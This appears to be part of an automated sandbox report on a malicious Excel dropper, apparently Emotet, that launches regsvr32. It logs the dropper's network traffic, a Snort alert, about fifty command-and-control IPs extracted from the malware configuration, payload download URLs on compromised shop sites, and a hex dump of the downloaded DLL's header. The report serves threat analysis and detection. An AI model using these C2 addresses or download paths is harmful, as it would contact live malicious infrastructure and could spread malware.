                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:80
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 163.172.108.69:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80

                      Networking

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 218.38.121.17 443
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2404328 ET CNC Feodo Tracker Reported CnC Server TCP group 15 192.168.2.22:49180 -> 218.38.121.17:443
                      Outdated Microsoft Office dropper detected
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDNS query: sat7ate.com is down
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorIPs: 218.38.121.17:443
                      Source: Malware configuration extractorIPs: 186.250.48.5:443
                      Source: Malware configuration extractorIPs: 80.211.107.116:8080
                      Source: Malware configuration extractorIPs: 174.138.33.49:7080
                      Source: Malware configuration extractorIPs: 165.22.254.236:8080
                      Source: Malware configuration extractorIPs: 185.148.169.10:8080
                      Source: Malware configuration extractorIPs: 62.171.178.147:8080
                      Source: Malware configuration extractorIPs: 128.199.217.206:443
                      Source: Malware configuration extractorIPs: 210.57.209.142:8080
                      Source: Malware configuration extractorIPs: 36.67.23.59:443
                      Source: Malware configuration extractorIPs: 160.16.143.191:8080
                      Source: Malware configuration extractorIPs: 128.199.242.164:8080
                      Source: Malware configuration extractorIPs: 178.238.225.252:8080
                      Source: Malware configuration extractorIPs: 118.98.72.86:443
                      Source: Malware configuration extractorIPs: 202.134.4.210:7080
                      Source: Malware configuration extractorIPs: 82.98.180.154:7080
                      Source: Malware configuration extractorIPs: 54.37.228.122:443
                      Source: Malware configuration extractorIPs: 64.227.55.231:8080
                      Source: Malware configuration extractorIPs: 195.77.239.39:8080
                      Source: Malware configuration extractorIPs: 103.254.12.236:7080
                      Source: Malware configuration extractorIPs: 103.85.95.4:8080
                      Source: Malware configuration extractorIPs: 178.62.112.199:8080
                      Source: Malware configuration extractorIPs: 83.229.80.93:8080
                      Source: Malware configuration extractorIPs: 114.79.130.68:443
                      Source: Malware configuration extractorIPs: 51.75.33.122:443
                      Source: Malware configuration extractorIPs: 139.196.72.155:8080
                      Source: Malware configuration extractorIPs: 188.165.79.151:443
                      Source: Malware configuration extractorIPs: 190.145.8.4:443
                      Source: Malware configuration extractorIPs: 196.44.98.190:8080
                      Source: Malware configuration extractorIPs: 198.199.70.22:8080
                      Source: Malware configuration extractorIPs: 103.56.149.105:8080
                      Source: Malware configuration extractorIPs: 104.244.79.94:443
                      Source: Malware configuration extractorIPs: 87.106.97.83:7080
                      Source: Malware configuration extractorIPs: 103.71.99.57:8080
                      Source: Malware configuration extractorIPs: 46.101.98.60:8080
                      Source: Malware configuration extractorIPs: 103.126.216.86:443
                      Source: Malware configuration extractorIPs: 103.224.241.74:8080
                      Source: Malware configuration extractorIPs: 37.44.244.177:8080
                      Source: Malware configuration extractorIPs: 85.214.67.203:8080
                      Source: Malware configuration extractorIPs: 202.28.34.99:8080
                      Source: Malware configuration extractorIPs: 175.126.176.79:8080
                      Source: Malware configuration extractorIPs: 85.25.120.45:8080
                      Source: Malware configuration extractorIPs: 93.104.209.107:8080
                      Source: Malware configuration extractorIPs: 103.41.204.169:8080
                      Source: Malware configuration extractorIPs: 78.47.204.80:443
                      Source: Malware configuration extractorIPs: 139.59.80.108:8080
                      Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: YYbWjqBjoLrCcX=SBgr/e6aC1IUNvJELTGXliW8JuD542AergoyMYXNvjxNLDRTdQNm8AuaxOmABbvgfv+8UtrcYH0nm8JVpNZn+3TWEfhRm/dUCR1CZolc/XwWvPSYMtjPL0bLJaxTy+IA9NnB1Bf21+p/nLECZUQKbQ3KotZmlTPMe1nDx9AvFrGbWdBwLhSH+OSwBm0uKoYGqTZIZ3usbgBMW4QV4nRpmrxN3K2+2Yb5BRhEeUfSv5e+Y0wUi7HP20VKUTWvvTmy+2YpSlrLS8NjnvoUHc/35DqIYRXDWKWVd2LKfBks9VLO8aBSd9lbpYy/Ixl+Ba5lMMnTILw8p+KXMtCwpS9WHost: 218.38.121.17
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: BepnebNbbnhLwN=d2b7sFWgS9DsqV+ktIDEPfDYK+u4VvGDu6RH8sqyC93zoy+j0gBi669p4anprtQEM0FTQaa5CcQDsE2n3Jik1MwelLYMW0cB2ckzSva1GTO9Ozuc6BuVVWHKD0CdjeEPdE+oGqdZWNtAUHV9t6hIutCFWcQnGko8pFlEzh+24tzbK7usfHuWSo1g9glenYgi3haMAIuRx4H0rCms/1aWJHObgPJCMzJMZePW+6QsU2qZksYBpCGLUBB4No5nO9JG4fI9x4h7VheOpHD72h9Li3R3N4z9E+yOI9ADuJ2vMtr3yhVwHost: 218.38.121.17
                      Source: Joe Sandbox ViewIP Address: 188.165.79.151 188.165.79.151
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 15 Nov 2022 11:43:52 GMTContent-Type: application/x-msdownloadContent-Length: 769024Connection: keep-aliveX-Powered-By: PHP/7.3.0Set-Cookie: 63737b78b11da=1668512632; expires=Tue, 15-Nov-2022 11:44:52 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Tue, 15 Nov 2022 11:43:52 GMTExpires: Tue, 15 Nov 2022 11:43:52 GMTContent-Disposition: attachment; filename="40hd04O0.dll"Content-Transfer-Encoding: binaryData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 d9 25 ba ec b8 4b e9 ec b8 4b e9 ec b8 4b e9 9a 25 26 e9 eb b8 4b e9 cb 7e 36 e9 e7 b8 4b e9 cb 7e 26 e9 43 b8 4b e9 9a 25 30 e9 fb b8 4b e9 ec b8 4a e9 f8 ba 4b e9 cb 7e 25 e9 76 b8 4b e9 cb 7e 31 e9 ed b8 4b e9 cb 7e 33 e9 ed b8 4b e9 52 69 63 68 ec b8 4b e9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 b6 15 64 63 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 08 00 00 5a 05 00 00 5e 06 00 00 00 00 00 60 23 03 00 00 10 00 00 00 00 00 10 00 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 60 0c 00 00 04 00 00 a8 56 0c 00 02 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 30 f8 0a 00 4f 00 00 00 50 d5 0a 00 dc 00 00 00 00 10 0c 00 b0 00 00 00 00 a0 0b 00 7c 65 00 00 00 00 00 00 00 00 00 00 00 20 0c 00 c4 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 05 00 10 0b 00 00 b0 d4 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 59 05 00 00 10 00 00 00 5a 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7f 88 05 00 00 70 05 00 00 8a 05 00 00 5e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 70 9d 00 00 00 00 0b 00 00 3a 00 00 00 e8 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 7c 65 00 00 00 a0 0b 00 00 66 00 00 00 22 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 b0 00 00 00 00 10 0c 00 00 02 00 00 00 88 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 6c 30 00 00 00 20 0c 00 00 32 00 00 00 8a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$%KKK%&K~6K
                      Source: unknownHTTPS traffic detected: 218.38.121.17:443 -> 192.168.2.22:49180 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 218.38.121.17:443 -> 192.168.2.22:49181 version: TLS 1.0
                      Source: global trafficHTTP traffic detected: GET /Adapter/moycMR/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.spinbalence.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /index.php?controller=404 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.spinbalence.comConnection: Keep-AliveCookie: PrestaShop-7318ab2db5e4a3c3a59fb8879ad22162=Nw04PzmYYXL6IgJsn1ERig61Z7mzgI5cdqQk7Ts1Z5oXp%2FAqcUL0r5BFPvLtErAiRnV0TG5b0npswANceXA1cwrQZJXojk9hvRnyRY37Ivk%3D000075
                      Source: global trafficHTTP traffic detected: GET /Content/Afa1PcRuxh/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.3d-stickers.comConnection: Keep-AliveCookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=9ybostxWPod7nP43PifVMefImKxeSKaZAdXmfdItKWNI2Ckr%2B1t%2BqGSwMBMouqmkFK0SD2XdZ7Cg5qtQQ9RwtmJfdpSnAaKPknzS3gL2v8c%3D000079
                      Source: global trafficHTTP traffic detected: GET /page-non-trouvee HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.3d-stickers.comConnection: Keep-AliveCookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=9ybostxWPod7nP43PifVMefImKxeSKaZAdXmfdItKWNolWp%2F7SQd8f90S8O%2FCwGohxkvf3iPluWhTbyznpM1hqQ6wpX78PX55d2aotWs5IA%3D000075
                      Source: global trafficHTTP traffic detected: GET /Adapter/moycMR/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.spinbalence.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /Content/Afa1PcRuxh/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.3d-stickers.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bsavxiv/axHQYKl/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: navylin.comConnection: Keep-Alive
                      Source: unknownNetwork traffic detected: IP country count 21
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49180 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49181 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49181
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49180
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Nov 2022 11:43:49 GMTServer: Apache/2.4.46 (FreeBSD) OpenSSL/1.0.2u-freebsdStrict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-UA-Compatible: IE=edge,chrome=1P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"Powered-By: PrestaShopStatus: 404 Not FoundSet-Cookie: PrestaShop-7318ab2db5e4a3c3a59fb8879ad22162=Nw04PzmYYXL6IgJsn1ERig61Z7mzgI5cdqQk7Ts1Z5oXp%2FAqcUL0r5BFPvLtErAilMIA%2BG6u6fOffdeloSSLftgvfHedjHZsx%2FnHB3u6bs5u%2F94PwbzL8h8iuQj5fU6ouxPvjTOMmxa%2BzRYyONLyaAb0hg9MOCCN3g2h1jkAF3E%3D000114; expires=Mon, 05-Dec-2022 11:43:49 GMT; Max-Age=1727999; path=/; domain=www.spinbalence.com; secure; httponly;HttpOnly;SecureConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Nov 2022 11:43:51 GMTServer: Apache/2.4.46 (FreeBSD) OpenSSL/1.0.2u-freebsdStrict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-UA-Compatible: IE=edge,chrome=1P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"Status: 404 Not FoundSet-Cookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=9ybostxWPod7nP43PifVMefImKxeSKaZAdXmfdItKWNolWp%2F7SQd8f90S8O%2FCwGo94XM8kzh2wgRtGRJ9nsrSdLdi59jw6GotzqA%2F%2BTveez7WUZj7S8ZwYcZXe6FVfsrOzQXtIeedQAsmUAviISLMDAANABHdlwwYRACr4DLkzU%3D000115; expires=Mon, 05-Dec-2022 11:43:51 GMT; Max-Age=1728000; path=/; domain=www.3d-stickers.com; httponly;HttpOnly;SecureConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: unknownTCP traffic detected without corresponding DNS query: 218.38.121.17
                      Source: regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: regsvr32.exe, 00000009.00000002.1211805437.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155093375.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: regsvr32.exe, 00000009.00000002.1211805437.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155093375.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1212625245.0000000003710000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: regsvr32.exe, 00000009.00000002.1211805437.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155093375.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: regsvr32.exe, 00000009.00000003.1155166331.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211753241.0000000000268000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://218.38.121.17/
                      Source: regsvr32.exe, 00000009.00000002.1211805437.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155093375.00000000002B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.coh
